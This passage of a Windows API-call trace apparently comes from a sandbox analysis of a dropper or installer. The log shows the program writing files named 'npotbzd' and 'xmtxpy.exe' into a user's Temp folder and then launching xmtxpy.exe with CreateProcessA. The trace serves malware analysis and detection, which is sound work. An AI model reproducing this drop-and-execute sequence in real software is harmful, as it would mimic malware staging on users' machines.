nNumberOfBytesToWrite=0x3f1d, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x3f1d, lpOverlapped=0x0) returned 1 [0177.240] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.240] GetTickCount () returned 0x1778e52 [0177.240] MulDiv (nNumber=200929, nNumerator=100, nDenominator=203681) returned 99 [0177.240] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 99%") returned 7 [0177.243] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x6be2, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x6be2, lpOverlapped=0x0) returned 1 [0177.244] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=4958, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x135e [0177.244] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.244] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.765] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.765] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.766] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.766] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.767] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.767] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.767] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.767] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.768] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.768] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.769] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.769] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.769] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.769] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.770] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.770] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.770] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.771] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.771] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.771] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.771] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.772] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.772] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.772] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.772] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x19d8, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x19d8, lpOverlapped=0x0) returned 1 [0177.772] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x19d8, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x19d8, lpOverlapped=0x0) returned 1 [0177.773] SetFileTime (hFile=0x28, lpCreationTime=0x19f92c, lpLastAccessTime=0x0, lpLastWriteTime=0x19f92c) returned 1 [0177.804] CloseHandle (hObject=0x28) returned 1 [0177.812] lstrcpynA (in: lpString1=0x40a768, lpString2="npotbzd", iMaxLength=1024 | out: lpString1="npotbzd") returned="npotbzd" [0177.812] lstrcpynA (in: lpString1=0x409b68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0177.812] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0177.812] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0177.812] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="npotbzd" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" [0177.812] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\npotbzd")) returned 0xffffffff [0177.813] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\npotbzd")) returned 0xffffffff [0177.813] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\npotbzd"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0177.814] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=224566, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x36d36 [0177.814] GetTickCount () returned 0x1779094 [0177.814] ReadFile (in: hFile=0x1d4, lpBuffer=0x19f784, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x19f784*, lpNumberOfBytesRead=0x19f778*=0x4, lpOverlapped=0x0) returned 1 [0177.814] GetTickCount () returned 0x1779094 [0177.814] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x12fa, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x12fa, lpOverlapped=0x0) returned 1 [0177.814] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x12fa, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x12fa, lpOverlapped=0x0) returned 1 [0177.816] SetFileTime (hFile=0x28, lpCreationTime=0x19f92c, lpLastAccessTime=0x0, lpLastWriteTime=0x19f92c) returned 1 [0177.816] CloseHandle (hObject=0x28) returned 1 [0177.818] lstrcpynA (in: lpString1=0x40a768, lpString2="xmtxpy.exe", iMaxLength=1024 | out: lpString1="xmtxpy.exe") returned="xmtxpy.exe" [0177.818] lstrcpynA (in: lpString1=0x409b68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0177.818] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0177.818] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0177.818] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="xmtxpy.exe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" [0177.818] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe")) returned 0xffffffff [0177.818] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe")) returned 0xffffffff [0177.819] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmtxpy.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0177.819] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=229428, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38034 [0177.819] GetTickCount () returned 0x1779094 [0177.819] ReadFile (in: hFile=0x1d4, lpBuffer=0x19f784, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x19f784*, lpNumberOfBytesRead=0x19f778*=0x4, lpOverlapped=0x0) returned 1 [0177.819] GetTickCount () returned 0x1779094 [0177.819] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=245276, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3be1c [0177.819] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=249432, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ce58 [0177.820] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.820] GetTickCount () returned 0x1779094 [0177.823] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x8000, lpOverlapped=0x0) returned 1 [0177.825] GetTickCount () returned 0x17790a4 [0177.825] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x31, lpOverlapped=0x0) returned 1 [0177.825] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.825] GetTickCount () returned 0x17790a4 [0177.828] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x711b, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x711b, lpOverlapped=0x0) returned 1 [0177.829] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.829] GetTickCount () returned 0x17790a4 [0177.833] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x8000, lpOverlapped=0x0) returned 1 [0177.834] GetTickCount () returned 0x17790a4 [0177.835] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x2559, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x2559, lpOverlapped=0x0) returned 1 [0177.835] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x2b4, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x2b4, lpOverlapped=0x0) returned 1 [0177.835] GetTickCount () returned 0x17790a4 [0177.835] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x53b, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x53b, lpOverlapped=0x0) returned 1 [0177.835] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=229432, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38038 [0177.835] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.835] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.837] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.838] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.838] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.838] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.838] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.838] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.839] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.839] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.839] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.839] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.840] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x4000, lpOverlapped=0x0) returned 1 [0177.840] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x4000, lpOverlapped=0x0) returned 1 [0177.840] ReadFile (in: hFile=0x1d4, lpBuffer=0x413038, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f778*=0x2a00, lpOverlapped=0x0) returned 1 [0177.840] WriteFile (in: hFile=0x28, lpBuffer=0x413038*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x19f790, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesWritten=0x19f790*=0x2a00, lpOverlapped=0x0) returned 1 [0177.841] SetFileTime (hFile=0x28, lpCreationTime=0x19f92c, lpLastAccessTime=0x0, lpLastWriteTime=0x19f92c) returned 1 [0177.841] CloseHandle (hObject=0x28) returned 1 [0177.844] lstrcpynA (in: lpString1=0x422e40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0177.844] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0177.844] lstrcpynA (in: lpString1=0x422e70, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0177.845] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0177.845] lstrcpynA (in: lpString1=0x409b68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" [0177.845] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x4224a0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f778 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd", lpProcessInformation=0x19f778*(hProcess=0x20c, hThread=0x28, dwProcessId=0x120c, dwThreadId=0x1210)) returned 1 [0180.163] CloseHandle (hObject=0x28) returned 1 [0180.163] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0180.353] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0180.354] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0180.660] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0180.660] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0181.609] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0181.610] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0181.724] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0181.724] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0182.296] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0182.297] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0183.836] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0183.837] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0185.149] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0185.149] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0186.865] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0186.865] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0188.238] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0188.238] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0188.725] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0188.725] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x64) returned 0x102 [0189.367] PeekMessageA (in: lpMsg=0x19f76c, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f76c) returned 0 [0189.367] WaitForSingleObject (hHandle=0x20c, 